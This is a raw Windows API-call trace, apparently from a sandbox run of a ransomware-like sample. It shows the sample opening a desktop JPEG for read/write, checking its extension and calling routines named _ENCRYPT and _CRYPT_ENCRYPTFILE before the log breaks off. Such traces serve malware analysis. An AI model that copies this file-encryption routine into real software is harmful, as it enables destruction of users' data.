[0030.065] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbb0 [0030.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.065] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhz507zecnmw5oel.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.065] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.065] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.066] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0030.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.066] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.066] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.066] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.066] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f2c09f0, ftCreationTime.dwHighDateTime=0x1d5c2aa, ftLastAccessTime.dwLowDateTime=0x22fc7280, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x22fc7280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x1245, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Nhz507zeCNmw5OeL.jpg", cAlternateFileName="NHZ507~1.JPG")) returned 0x7c20c0 [0030.066] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.067] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f2c09f0, ftCreationTime.dwHighDateTime=0x1d5c2aa, ftLastAccessTime.dwLowDateTime=0x22fc7280, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x22fc7280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x1245, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Nhz507zeCNmw5OeL.jpg", cAlternateFileName="NHZ507~1.JPG")) returned 0x7c20c0 [0030.067] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0030.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0030.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nhz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hz507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="507zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zeCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eCNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CNmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nmw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mw5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5OeL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0030.070] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af468 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0030.070] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.071] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f2c09f0, ftCreationTime.dwHighDateTime=0x1d5c2aa, ftLastAccessTime.dwLowDateTime=0x22fc7280, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x22fc7280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x1245, dwReserved0=0x6ae908, 